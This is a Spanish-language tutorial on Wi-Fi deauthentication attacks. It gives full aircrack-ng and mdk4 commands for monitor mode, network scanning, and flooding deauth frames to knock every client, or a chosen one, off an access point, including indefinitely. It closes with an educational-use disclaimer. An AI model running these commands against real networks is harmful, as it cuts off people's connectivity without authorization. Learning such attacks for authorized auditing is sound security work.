Ataque de desautenticación Wi-Fi

> Un ataque de desautenticación Wi-Fi, también conocido como denegación de servicio a nivel red, consiste en inundar de solicitudes al punto de acceso o... Linux

# Introducción

Un ataque de desautenticación Wi-Fi, también conocido como denegación de servicio a nivel red, consiste en inundar de solicitudes al punto de acceso o estación para saturar el ancho de banda con el objetivo de desconectar a todos los clientes de la red por un tiempo definido. Las tramas de desautenticación se realizan normalmente para determinar una conexión entre un cliente y un punto de acceso (AP) sin necesidad de ir cifrado. Por lo tanto, cualquier persona dentro de la red local (LAN) puede falsificar la dirección MAC de la víctima o AP.

En el siguiente esquema se observa como el Atacante envía solicitudes masivas al Punto de Acceso, haciendo que el/los clientes u otros equipos que estén conectados a la red LAN se vean afectados.

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

# AIRCRACK-NG

Existen infinidades de herramientas para realizar este ataque, una de las más conocidas es la suite de Aircrack-ng, ya viene incorporada en distribuciones basadas en Debian como lo es Kali Linux y Parrot OS.

Instalar en Debian:

$ sudo apt-get install aircrack-ng

Pero antes que nada hay que reconocer la dirección MAC del objetivo (AP) y para ello es necesario poner nuestra tarjeta de red en modo monitor. Esto permitirá escuchar y capturar todos los paquetes que viajan en el aire.

$ ifconfig <INTERFAZ> down
iwconfig <INTERFAZ> mode monitor
ifconfig <INTERFAZ> up

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

Si lo prefieren automatizado:

$ airmon-ng start <INTERFAZ>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

Lo siguiente será matar los procesos PID para no presentar ningún error al momento de auditar la red. Cada PID es único y se puede matar de forma manual según su ID:

$ pkill <nombre-del-proceso>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

Pero si lo preferimos, airmon lo hace automatizado por nosotros:

$ airmon-ng check kill

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

A continuación, es momento de reconocer las redes de nuestro alrededor:

$ airodump-ng wlan0

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

BSSID: Dirección MAC del punto de acceso.

PWR: Rango en el que se encuentra el AP.

Beacons: Número de paquetes envíado por el AP.

#Data: Número de paquetes capturados.

CH: Número de canal donde opera el AP.

MB: Velocidad máxima soportada por el AP. MB = 11 es 802.11b, si MB = 22 es 802.11b+ y hasta 54 son 802.11g.

ENC: Tipo de algoritmo de cifrado, generalmente las redes privadas utilizan WPA/WPA2 y WEP. En caso de ser una red pública, el algoritmo que utilizará es OPN = sin encriptación.

AUTH: Protocolo de autenticación utilizado.

ESSID: Nombre de la red inalámbrica.

Luego de reconocer el BSSID y el canal, quedaría capturar los paquetes del AP objetivo:

$ airodump-ng -c <N-CHANNEL> --bssid <MAC-AP> <INTERFAZ>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

La STATION son los clientes que están conectados la red (BSSID). En otra terminal proseguiremos a lanzar el ataque de desautenticación para desconectarlos:

$ aireplay-ng --deauth <SEGUNDOS> -a <MAC-AP> <INTERFAZ>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

Al específicar el tiempo en 0 el ataque será ilimitado, el párametro a es el BSSID del punto de acceso que atacará, permitiendo así que todos los clientes no puedan conectarse a dicha red.

El ejemplo anterior desconectará a todos los dispositivos de la red. Ahora, si quisieramos desautenticar a un dispositivo en específico utilizamos el parámetro -c + la dirección MAC del dispositivo (STATION).

$ aireplay-ng --deauth <SEGUNDOS> -a <MAC-AP> -c <MAC> <INTERFAZ>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

# MDK3

Mdk4 es la nueva actualización de Mdk3. Es una herramienta para pruebas de de Wi-Fi desarrollada por el propio proyecto de aircrack-ng.

Instalar en Debian:

$ sudo apt install mdk4

Mdk4 contiene distintos parámetros con subparámetros de ataques, entre ellos, desautenticación:

d: Modo desautenticación

-c: Salto de canal.

-E: Nombre del punto de acceso (ESSID).

-B: Dirección MAC del punto de acceso (BSSID).

-S: Dirección MAC del cliente (STATION).

Expulsar a todos los clientes de la red:

$ mdk4 <INTERFAZ> d -c 1,6,10 -E <ESSID>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

Expulsar un cliente en específico:

$ mdk4 <INTERFAZ> d -S <MAC-CLIENTE>

Ilustración del procedimiento
Ilustración del procedimiento 🔍 click para ampliar

Advertencia: Todo el contenido de este artículo es estrictamente educativo. No nos hacemos responsables del mal uso de esta herramienta o información. Practica únicamente en entornos controlados y con autorización.
× Imagen ampliada